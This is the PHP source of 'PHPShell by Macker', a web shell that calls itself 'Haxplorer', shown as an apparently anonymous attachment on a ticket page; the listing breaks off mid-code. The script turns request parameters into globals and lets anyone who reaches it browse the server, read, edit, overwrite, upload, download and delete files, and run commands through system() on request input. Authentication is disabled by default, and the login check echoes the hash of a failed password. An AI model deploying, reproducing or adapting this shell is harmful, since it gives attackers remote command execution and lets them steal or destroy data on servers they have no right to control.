Context Navigation

Back to Ticket #96

Ticket #96: phpshell.php

File phpshell.php, 37.2 KB (added by anonymous, 18 years ago)

Line
1	<?php
2
3	/*
4	*****************************************************************************************
5	* PHPSHELL.PHP BY MACKER 30 March 2003 *
6	*****************************************************************************************
7	* *
8	* Welcome to Macker's PHPShell script... *
9	* This script will allow you to browse webservers etc... *
10	* Just copy the file to your directory and open it in your Internet Browser. *
11	* *
12	* The webserver should support PHP... *
13	* *
14	* You can modify the script if you want, but please send me a copy to: *
15	* DRAZZ01@HOTMAIL.COM *
16	*****************************************************************************************
17
18	!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
19	!! PLEASE NOTE: You should use this script at own risk, it should do damage to the !!
20	!! Sites or even the server... You are responsible for your own deeds. !!
21	!! The admin of your webserver should always know you are using this !!
22	!! script. !!
23	!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
24	*/
25
26
27	/Setting some envirionment variables.../
28
29	$SFileName=$PHP_SELF; /*I added this to ensure the script will run correctly...
30	Please enter the Script's filename in this variable.*
31
32	/* uncomment the two following variables if you want to use http
33	authentication. This will password protect your PHPShell */
34
35	function walkArray($array){
36	while (list($key, $data) = each($array)) {
37	if (is_array($data)) {
38	walkArray($data);
39	}
40	else {
41	global $$key;
42	$$key = $data;
43	}
44	}
45	}
46	if (isset($_PUT)) walkArray($_PUT);
47	if (isset($_GET)) walkArray($_GET);
48	if (isset($_POST)) walkArray($_POST);
49
50	error_reporting(0);
51	$PHPVer=phpversion();
52	$isGoodver=(intval($PHPVer[0])>=4);
53	$scriptTitle = "PHPShell";
54	$scriptident = "$scriptTitle by Macker";
55
56	if (empty($Pmax))
57	$Pmax = 50; /* Identifies the max amount of Directories and files listed on one page */
58	if (empty($Pidx))
59	$Pidx = 0;
60
61	$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
62	$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
63
64	$scriptdate = "30 march 2003";
65	$scriptver = "Version 2.6.3dev";
66	$LOCAL_IMAGE_DIR = "img";
67	$REMOTE_IMAGE_URL = "img";
68	$img = array(
69	"Edit" => "edit.JPG",
70	"Download" => "download.JPG",
71	"Upload" => "upload.JPG",
72	"Delete" => "delete.JPG",
73	"View" => "view.JPG",
74	"Rename" => "rename.JPG",
75	"Move" => "move.JPG",
76	"Copy" => "copy.JPG",
77	"Execute" => "exec.JPG"
78	);
79
80	while (list($id, $im)=each($img))
81	if (file_exists("$LOCAL_IMAGE_DIR/$im"))
82	$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
83	else
84	$img[$id] = "[$id]";
85
86
87	/* HTTP AUTHENTICATION */
88
89	if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) \|\| $PHP_AUTH_USER != $http_auth_user \|\| md5($PHP_AUTH_PW) != $http_auth_pass) \|\| (($logoff==1) && $noauth=="yes") ) {
90	setcookie("noauth","");
91	Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
92	Header( "HTTP/1.0 401 Unauthorized");
93	echo "Your username or password is incorrect";
94	echo "\n\n" . md5($PHP_AUTH_PW);
95	exit ;
96
97	}
98
99	function spacetonbsp($instr) { return str_replace(" ", " ", $instr); }
100
101	function Mydeldir($Fdir) {
102	if (is_dir($Fdir)) {
103	$Fh=@opendir($Fdir);
104	while ($Fbuf = readdir($Fh))
105	if (($Fbuf != ".") && ($Fbuf != ".."))
106	Mydeldir("$Fdir/$Fbuf");
107	@closedir($Fh);
108	return rmdir($Fdir);
109	} else {
110	return unlink($Fdir);
111	}
112	}
113
114	function formatsize($insize) {
115	$size = $insize;
116	$add = "B";
117	if ($size > 1024) {
118	$size = intval(intval($size) / 1.024)/1000;
119	$add = "KB";
120	}
121	if ($size > 1024) {
122	$size = intval(intval($size) / 1.024)/1000;
123	$add = "MB";
124	}
125	if ($size > 1024) {
126	$size = intval(intval($size) / 1.024)/1000;
127	$add = "GB";
128	}
129	if ($size > 1024) {
130	$size = intval(intval($size) / 1.024)/1000;
131	$add = "TB";
132	}
133	return "$size $add";
134	}
135
136	if ($cmd != "downl") {
137	?>
138
139	<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
140	<HTML>
141	<HEAD>
142	<STYLE>
143	<!--
144	A{ text-decoration:none; color:navy; font-size: 12px }
145	body { font-size: 12px;
146	background-image: url(img/repeat.bmp);
147	scrollbar-width: 5;
148	scrollbar-face-color: silver;
149	scrollbar-shadow-color: gray;
150	scrollbar-highlight-color: white;
151	scrollbar-3dlight-color:black;
152	scrollbar-darkshadow-color: black;
153	scrollbar-track-color:#dddddd;
154	scrollbar-arrow-color: black;
155	}
156	Table { font-size: 12px; }
157	TR{ font-size: 12px; }
158	TD{ font-size: 12px; BORDER-LEFT: black 0px solid; BORDER-RIGHT: black 0px solid; BORDER-TOP: black 0px solid; BORDER-BOTTOM: black 0px solid; COLOR: black; }
159	.border{ BORDER-LEFT: black 1px solid;
160	BORDER-RIGHT: black 1px solid;
161	BORDER-TOP: black 1px solid;
162	BORDER-BOTTOM: black 1px solid;
163	}
164	.none { BORDER-LEFT: black 0px solid;
165	BORDER-RIGHT: black 0px solid;
166	BORDER-TOP: black 0px solid;
167	BORDER-BOTTOM: black 0px solid;
168	}
169	.inputtext {
170	background-color: #EFEFEF;
171	border: 1px solid #000000;
172	height: 20;
173	}
174	.inputbutton {
175	background-color: silver;
176	border: 1px solid #000000;
177	border-width: 1px;
178	height: 20;
179	}
180	.white {
181	background-color: #FFFFFF;
182	}
183	.inputtextarea {
184	background-color: #EFEFEF;
185	border: 1px solid #000000;
186	scrollbar-width: 5;
187	scrollbar-height: 5;
188	scrollbar-face-color: #EFEFEF;
189	scrollbar-shadow-color: silver;
190	scrollbar-highlight-color: #EFEFEF;
191	scrollbar-3dlight-color:silver;
192	scrollbar-darkshadow-color: silver;
193	scrollbar-track-color: #EFEFEF;
194	scrollbar-arrow-color: black;
195	}
196	.top { BORDER-TOP: black 1px solid; }
197	.textin { BORDER-LEFT: silver 1px solid;
198	BORDER-RIGHT: silver 1px solid;
199	BORDER-TOP: silver 1px solid;
200	BORDER-BOTTOM: silver 1px solid;
201	width: 99%; font-size: 12px; font-weight: bold; color: navy;
202	}
203	.notop { BORDER-TOP: black 0px solid; }
204	.bottom { BORDER-BOTTOM: black 1px solid; }
205	.nobottom { BORDER-BOTTOM: black 0px solid; }
206	.left { BORDER-LEFT: black 1px solid; }
207	.noleft { BORDER-LEFT: black 0px solid; }
208	.right { BORDER-RIGHT: black 1px solid; }
209	.noright { BORDER-RIGHT: black 0px solid; }
210	.silver{ BACKGROUND: silver; }
211	-->
212	</STYLE>
213	<TITLE><?php echo $SFileName ?></TITLE>
214	</HEAD>
215	<body bottommargin="0" rightmargin="0" topmargin="0" leftmargin="0">
216	<table width=100% height="100%" NOWRAP border="0">
217	<tr NOWRAP>
218	<td width="100%" NOWRAP>
219	<table NOWRAP width=100% height="100%" border="0" cellpadding="0" cellspacing="0">
220	<tr>
221	<td width="100%" height="15" class="silver border">
222	<center>
223	<strong>
224	<font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font>
225	</strong>
226	</center>
227	</td>
228	</tr>
229	<tr><td valign="middle"><br>
230
231	<?php
232	}
233
234	if ( $cmd=="dir" ) {
235	$h=@opendir($dir);
236	if ($h == false) {
237	echo "<br><font color=\"red\">   \n\n\n\n
238	COULD NOT OPEN THIS DIRECTORY!!!<br>   \n
239	THE SCRIPT WILL RESULT IN AN ERROR!!!
240	<br><br>   \n
241	PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
242	<br><br></font>\n\n\n\n";
243	}
244	if (function_exists('realpath')) {
245	$partdir = realpath($dir);
246	}
247	else {
248	$partdir = $dir;
249	}
250	if (strlen($partdir) >= 100) {
251	$partdir = substr($partdir, -100);
252	$pos = strpos($partdir, "/");
253	if (strval($pos) != "") {
254	$partdir = "<-- ...".substr($partdir, $pos);
255	}
256	$partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
257	$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
258	$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
259	}
260	?>
261	<form name="urlform" action="<?php echo $SFileName ?>"><input type="hidden" name="cmd" value="dir">
262	<table class="white" NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
263	<tr>
264	<td width="100%" class="silver border">
265	<center> HAXPLORER - Server Files Browser... </center>
266	</td>
267	</tr>
268	</table>
269	<br>
270	<table class="white" width="100%" border="0" cellpadding="0" cellspacing="0">
271	<tr>
272	<td class="border nobottom noright">
273	Browsing:
274	</td>
275	<td width="100%" class="border nobottom noleft">
276	<table width="100%" border="0" cellpadding="1" cellspacing="0">
277	<tr>
278	<td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
279	<td NOWRAP><center> <a href="javascript: urlform.submit();"><b>GO<b></a> <center></td>
280	</tr>
281	</table>
282
283	</td>
284	</tr>
285	</table>
286	<!-- </form> -->
287	<table class="white" NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
288	<tr>
289	<td width="100%" NOWRAP class="silver border">
290	Filename
291	</td>
292	<td NOWRAP class="silver border noleft">
293	Actions (Attempt to perform)
294	</td>
295	<td NOWRAP class="silver border noleft">
296	Size
297	</td>
298	<td width=1 NOWRAP class="silver border noleft">
299	Attributes
300	</td>
301	<td NOWRAP class="silver border noleft">
302	Modification Date
303	</td>
304	<tr>
305	<?php
306
307
308	/* <!-- This whole heap of junk is the sorting section... */
309
310	$dirn = array();
311	$filen = array();
312	$filesizes = 0;
313	while ($buf = readdir($h)) {
314	if (is_dir("$dir/$buf"))
315	$dirn[] = $buf;
316	else {
317	$size = @filesize("$dir/$buf");
318	If ($size != false) {
319	$filesizes = $filesizes + $size;
320	}
321	$filen[] = $buf;
322	} }
323	$dirno = count($dirn) + 1;
324	$fileno = count($filen) + 1;
325
326	function mycmp($a, $b){
327	if ($a == $b) return 0;
328	return (strtolower($a) < strtolower($b)) ? -1 : 1;
329	}
330
331	if (function_exists("usort")) {
332	usort($dirn, "mycmp");
333	usort($filen, "mycmp");
334	}
335	else {
336	sort ($dirn);
337	sort ($filen);
338	}
339	reset ($dirn);
340	reset ($filen);
341	if (function_exists('array_merge')) {
342	$filelist = array_merge ($dirn, $filen);
343	}
344	else {
345	$filelist = $dirn + $filen;
346	}
347
348
349	if ( count($filelist)-1 > $Pmax ) {
350	$from = $Pidx * $Pmax;
351	$to = ($Pidx + 1) * $Pmax-1;
352	if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
353	$to = count($filelist) - 1;
354	if ($to > count($filelist)-1)
355	$to = count($filelist)-1;
356	$Dcontents = array();
357	For ($Fi = $from; $Fi <= $to; $Fi++) {
358	$Dcontents[] = $filelist[$Fi];
359	}
360
361	}
362	else {
363	$Dcontents = $filelist;
364	}
365
366	while (list ($key, $file) = each ($Dcontents)) {
367	if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
368	/* <!-- Dirname --> */
369	echo "<tr><td NOWRAP class=\"top left right\">   <a href=\"$SFileName?cmd=dir&dir=$dir/$file\">[$file]</a>         </td>\n";
370	/* <!-- Actions --> */
371	echo "<td NOWRAP class=\"top right\"><center>  \n";
372	/* <!-- Rename --> */
373	if ( ($file != ".") && ($file != "..") )
374	echo "<a href=\"$SFileName?cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file\">".$img["Rename"]."</a>   \n";
375	/* <!-- Delete --> */
376	if ( ($file != ".") && ($file != "..") )
377	echo "   <a href=\"$SFileName?cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir\">".$img["Delete"]."</a>\n";
378	/* <!-- End of Actions --> */
379	echo "  </center></td>\n";
380	/* <!-- Size --> */
381	echo "<td NOWRAP class=\"top right\"> </td>\n";
382	/* <!-- Attributes --> */
383	echo "<td NOWRAP class=\"top right\">  \n";
384	echo "<strong>D</strong>";
385	if ( @is_readable("$dir/$file") ) {
386	echo "<strong>R</strong>";
387	}
388	if (function_exists('is_writeable')) {
389	if ( @is_writeable("$dir/$file") ) {
390	echo "<strong>W</stong>";
391	}
392	}
393	else {
394	echo "<strong>(W)</stong>";
395	}
396	if ( @is_executable("$dir/$file") ) {
397	echo "<Strong>X<strong>";
398	}
399	echo "  </td>\n";
400	/* <!-- Date --> */
401	echo "<td NOWRAP class=\"top right\" NOWRAP>\n";
402	echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  ";
403	echo "</td>";
404	echo "</tr>\n";
405
406	}
407	else { /* <!-- Then it must be a File... --> */
408	/* <!-- Filename --> */
409	if ( @is_readable("$dir/$file") )
410	echo "<tr><td NOWRAP class=\"top left right\">   <a href=\"$SFileName?cmd=file&file=$dir/$file\">$file</a>         </td>\n";
411	else
412	echo "<tr><td NOWRAP class=\"top left right\">   $file         </td>\n";
413	/* <!-- Actions --> */
414	echo "<td NOWRAP class=\"top right\"><center>  \n";
415	/* <!-- Rename --> */
416	echo "<a href=\"$SFileName?cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file\">".$img["Rename"]."</a>   \n";
417	/* <!-- Edit --> */
418	if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
419	echo "<a href=\"$SFileName?cmd=edit&file=$dir/$file\">".$img["Edit"]."</a>   \n";
420	/* <!-- Copy --> */
421	echo "<a href=\"$SFileName?cmd=copy&file=$dir/$file\">".$img["Copy"]."</a>\n";
422	/* <!-- Move --> */
423	if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
424	echo "   <a href=\"$SFileName?cmd=move&file=$dir/$file\">".$img["Move"]."</a>\n";
425	/* <!-- Delete --> */
426	echo "   <a href=\"$SFileName?cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir\">".$img["Delete"]."</a>\n";
427	/* <!-- Download --> */
428	echo "   <a href=\"$SFileName?cmd=downl&file=$dir/$file\">".$img["Download"]."</a>\n";
429	/* <!-- Execute --> */
430	if ( @is_executable("$dir/$file") )
431	echo "   <a href=\"$SFileName?cmd=execute&file=$dir/$file\">".$img["Execute"]."</a>\n";
432	/* <!-- End of Actions --> */
433	echo "  </center></td>\n";
434	/* <!-- Size --> */
435	echo "<td NOWRAP align=\"right\" class=\"top right\" NOWRAP >\n";
436	$size = @filesize("$dir/$file");
437	If ($size != false)
438	echo "  <strong>".formatsize($size)."<strong>";
439	else
440	echo "  <strong>0 B<strong>";
441	echo "  </td>\n";
442
443	/* <!-- Attributes --> */
444	echo "<td NOWRAP class=\"top right\">  \n";
445
446	if ( @is_readable("$dir/$file") )
447	echo "<strong>R</strong>";
448	if ( @is_writeable("$dir/$file") )
449	echo "<strong>W</stong>";
450	if ( @is_executable("$dir/$file") )
451	echo "<Strong>X<strong>";
452	if (function_exists('is_uploaded_file')){
453	if ( @is_uploaded_file("$dir/$file") )
454	echo "<Strong>U<strong>";
455	}
456	else {
457	echo "<Strong>(U)<strong>";
458	}
459	echo "  </td>\n";
460	/* <!-- Date --> */
461	echo "<td NOWRAP class=\"top right\" NOWRAP>\n";
462	echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  ";
463	echo "</td>";
464	echo "</tr>\n";
465	}
466	}
467
468	echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
469	echo "  ".@count ($dirn)." Dir(s), ".@count ($filen)." File(s)  \n";
470	echo "</td><td NOWRAP class=\"silver border noleft\">\n";
471	echo "  Total filesize: ".formatsize($filesizes)."  <td></tr>\n";
472
473	function printpagelink($a, $b, $link = ""){
474	if ($link != "")
475	echo "<A HREF=\"$link\"><b>\| $a - $b \|</b></A>";
476	else
477	echo "<b>\| $a - $b \|</b>";
478	}
479
480	if ( count($filelist)-1 > $Pmax ) {
481	echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
482	$Fi = 0;
483	while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
484	$from = $Fi*$Pmax;
485	while (($filelist[$from]==".") \|\| ($filelist[$from]=="..")) $from++;
486	$to = ($Fi + 1) * $Pmax - 1;
487	if ($Fi == $Pidx)
488	$link="";
489	else
490	$link="$SFilename?cmd=$cmd&dir=$dir&Pidx=$Fi";
491	printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
492	echo "   ";
493	$Fi++;
494	}
495	$from = $Fi*$Pmax;
496	while (($filelist[$from]==".") \|\| ($filelist[$from]=="..")) $from++;
497	$to = count($filelist)-1;
498	if ($Fi == $Pidx)
499	$link="";
500	else
501	$link="$SFilename?cmd=$cmd&dir=$dir&Pidx=$Fi";
502	printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
503
504
505	echo "</center></td></tr></table></td></tr>";
506	}
507
508
509	echo "</table>\n<br><table NOWRAP>";
510
511	if ($isGoodver) {
512	echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version:  </strong> </td><td> $PHPVer </td></tr>\n";
513	}
514	else {
515	echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version:  </strong> </td><td> $PHPVer (Some functions might be unavailable...) </td></tr>\n";
516	}
517	/* <!-- Other Actions --> */
518	echo "<tr><td class=\"silver border\"> <strong>Other actions:  </strong> </td>\n";
519	echo "<td> <b><a href=\"$SFileName?cmd=newfile&lastcmd=dir&lastdir=$dir\">\| New File \|</a>\n   <a href=\"$SFileName?cmd=newdir&lastcmd=dir&lastdir=$dir\">\| New Directory \|</a>\n   <a href=\"$SFileName?cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir\">\| Upload a File \|</a></b>\n</td></tr>\n";
520	echo "<tr><td class=\"silver border\"> <strong>Script Location:  </strong> </td><td> $PATH_TRANSLATED</td></tr>\n";
521	echo "<tr><td class=\"silver border\"> <strong>Your IP:  </strong> </td><td> $REMOTE_ADDR </td></tr>\n";
522	echo "<tr><td class=\"silver border\"> <strong>Browsing Directory:  </strong></td><td> $partdir </td></tr>\n";
523	echo "<tr><td valign=\"top\" class=\"silver border\"> <strong>Legend:  </strong </td><td>\n";
524	echo "<table NOWRAP>";
525	echo "<tr><td><strong>D:</strong></td><td>  Directory.</td></tr>\n";
526	echo "<tr><td><strong>R:</strong></td><td>  Readable.</td></tr>\n";
527	echo "<tr><td><strong>W:</strong></td><td>  Writeable.</td></tr>\n";
528	echo "<tr><td><strong>X:</strong></td><td>  Executable.</td></tr>\n";
529	echo "<tr><td><strong>U:</strong></td><td>  HTTP Uploaded File.</td></tr>\n";
530	echo "</table></td>";
531	echo "</table>";
532	echo "<br>";
533	@closedir($h);
534	}
535	elseif ( $cmd=="execute" ) {/<!-- Execute the executable -->/
536	echo system("$file");
537	}
538	elseif ( $cmd=="deldir" ) { /<!-- Delete a directory and all it's files --> /
539	echo "<center><table><tr><td NOWRAP>" ;
540	if ($auth == "yes") {
541	if (Mydeldir($file)==false) {
542	echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
543	}
544	else {
545	echo "Successfully removed \"$file\"<br>";
546	}
547	echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
548	}
549	else {
550	echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
551	<form action=\"$SFileName\" method=\"POST\">
552	<input type=\"hidden\" name=\"cmd\" value=\"deldir\">
553	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
554	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
555	<input type=\"hidden\" name=\"file\" value=\"$file\">
556	<input type=\"hidden\" name=\"auth\" value=\"yes\">
557	<input type=\"submit\" value=\"Yes\"></form>
558	<form action=\"$SFileName\" method=\"POST\">
559	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
560	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
561	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
562	}
563	echo "</td></tr></center>";
564	}
565	elseif ( $cmd=="delfile" ) { /<!-- Delete a file --> / echo "<center><table><tr><td NOWRAP>" ;
566	if ($auth == "yes") {
567	if (@unlink($file)==false) {
568	echo "Could not remove \"$file\"<br>";
569	}
570	else {
571	echo "Successfully removed \"$file\"<br>";
572	}
573	echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
574	}
575	else {
576	echo "Are you sure you want to delete \"$file\" ?
577	<form action=\"$SFileName\" method=\"POST\">
578	<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
579	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
580	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
581	<input type=\"hidden\" name=\"file\" value=\"$file\">
582	<input type=\"hidden\" name=\"auth\" value=\"yes\">
583
584	<input type=\"submit\" value=\"Yes\"></form>
585	<form action=\"$SFileName\" method=\"POST\">
586	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
587	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
588	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
589	}
590	echo "</td></tr></center>";
591	}
592	elseif ( $cmd=="newfile" ) { /<!-- Create new file with default name --> /
593	echo "<center><table><tr><td NOWRAP>";
594	$i = 1;
595	while (file_exists("$lastdir/newfile$i.txt"))
596	$i++;
597	$file = fopen("$lastdir/newfile$i.txt", "w+");
598	if ($file == false)
599	echo "Could not create the new file...<br>";
600	else
601	echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
602	echo "
603	<form action=\"$SFileName\" method=\"POST\">
604	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
605	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
606	<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
607	</form></center>
608	</td></tr></table></center> ";
609	}
610	elseif ( $cmd=="newdir" ) { /<!-- Create new directory with default name --> /
611	echo "<center><table><tr><td NOWRAP>" ;
612	$i = 1;
613	while (is_dir("$lastdir/newdir$i"))
614	$i++;
615	$file = mkdir("$lastdir/newdir$i", 0777);
616	if ($file == false)
617	echo "Could not create the new directory...<br>";
618	else
619	echo "Successfully created: \"$lastdir/newdir$i\"<br>";
620	echo "<form action=\"$SFileName\" method=\"POST\">
621	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
622	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
623	<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
624	</form></center></td></tr></table></center>";
625	}
626	elseif ( $cmd=="edit" ) { /<!-- Edit a file and save it afterwards with the saveedit block. --> /
627	$contents = "";
628	$fc = @file( $file );
629	while ( @list( $ln, $line ) = each( $fc ) ) {
630	$contents .= htmlentities( $line ) ;
631	}
632	echo "<br><center><table><tr><td NOWRAP>";
633	echo "<form action=\"$SFileName\" method=\"post\">\n";
634	echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
635	echo "<strong>EDIT FILE: </strong>$file<br>\n";
636	echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
637	echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
638	echo "<input type=\"submit\" value=\"Save\">";
639	echo "</form>";
640	echo "</td></tr></table></center>";
641	}
642	elseif ( $cmd=="saveedit" ) { /<!-- Save the edited file back to a file --> /
643	$fo = fopen($file, "w");
644	$wrret = fwrite($fo, stripslashes($contents));
645	$clret = fclose($fo);
646	}
647	elseif ( $cmd=="downl" ) { /<!-- Save the edited file back to a file --> /
648	$downloadfile = urldecode($file);
649	if (function_exists("basename"))
650	$downloadto = basename ($downloadfile);
651	else
652	$downloadto = "download.ext";
653	if (!file_exists("$downloadfile"))
654	echo "The file does not exist";
655	else {
656	$size = @filesize("$downloadfile");
657	if ($size != false) {
658	$add="; size=$size";
659	}
660	else {
661	$add="";
662	}
663	header("Content-Type: application/download");
664	header("Content-Disposition: attachment; filename=$downloadto$add");
665	$fp=fopen("$downloadfile" ,"rb");
666	fpassthru($fp);
667	flush();
668	}
669	}
670	elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
671	?>
672	<center>
673	<table>
674	<tr>
675	<td NOWRAP>
676	Welcome to the upload section...
677	Please note that the destination file will be
678	<br> overwritten if it already exists!!!<br><br>
679	<form enctype="multipart/form-data" action="<?php echo $SFileName ?>" method="post">
680	<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
681	<input type="hidden" name="cmd" value="uploadproc">
682	<input type="hidden" name="dir" value="<?php echo $dir ?>">
683	<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
684	<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
685	Select local file:<br>
686	<input size="75" name="userfile" type="file"><br>
687	<input type="submit" value="Send File">
688	</form>
689	<br>
690	<form action="<?php echo $SFileName ?>" method="POST">
691	<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
692	<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
693	<input tabindex="0" type="submit" value="Cancel">
694	</form>
695	</td>
696	</tr>
697	</table>
698	</center>
699
700	<?php
701	}
702	elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
703	echo "<center><table><tr><td NOWRAP>";
704	if (file_exists($userfile))
705	$res = copy($userfile, "$dir/$userfile_name");
706	echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
707	if ($res) {
708	echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
709	echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>";
710	echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
711	}
712	else {
713	echo "Could not move uploaded file; Action aborted...";
714	}
715	echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
716	echo "<br><br></td></tr></table></center>";
717	}
718	elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
719	$fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) {
720	$total .= $line."";
721	}
722	//echo spacetonbsp(@htmlentities($line))."<br>\n";
723	ob_start();
724	highlight_string ($total);
725	$raw = ob_get_contents();
726	ob_end_clean();
727
728	$raw = explode ( '<br />', $raw );
729	$ml = strlen ( count ( $raw ) );
730	for ( $i = 0; $i < count ( $raw ); $i++ ) {
731	if ( !isset ( $noline ) ) {
732	$gap = ( $ml - strlen ( $i ) );
733	$raw[$i] = "<FONT COLOR=#999999><CODE>[" . str_repeat(" ", $gap ) . $i . "]</CODE>  </FONT>" . $raw[$i] . "<BR />";
734	}
735	else {
736	$raw[$i] = "$raw[$i]<BR />";
737	}
738	}
739	$raw = implode ( '', $raw );
740	echo "<table class=\"white border\" width=\"100%\"><tr><td valign=\"top\"><br>$raw<br><br></td></tr></table>";
741	}
742	elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
743	if (function_exists('is_dir')) {
744	if (is_dir("$oldfile")) {
745	$objname = "Directory";
746	$objident = "Directory";
747	}
748	else {
749	$objname = "Filename";
750	$objident = "file";
751	}
752	}
753	echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center> Rename a file: </center></td></tr></table><br>\n";
754	If (empty($newfile) != true) {
755	echo "<center>";
756	$return = @rename($oldfile, "$olddir$newfile");
757	if ($return) {
758	echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
759	}
760	else {
761	if ( @file_exists("$olddir$newfile") ) {
762	echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
763	}
764	else {
765	echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
766	}
767	}
768	echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
769	}
770	else {
771	$dpos = strrpos($oldfile, "/");
772	if (strval($dpos)!="") {
773	$olddir = substr($oldfile, 0, $dpos+1);
774	}
775	else {
776	$olddir = "$lastdir/";
777	}
778	$fpos = strrpos($oldfile, "/");
779	if (strval($fpos)!="") {
780	$inputfile = substr($oldfile, $fpos+1);
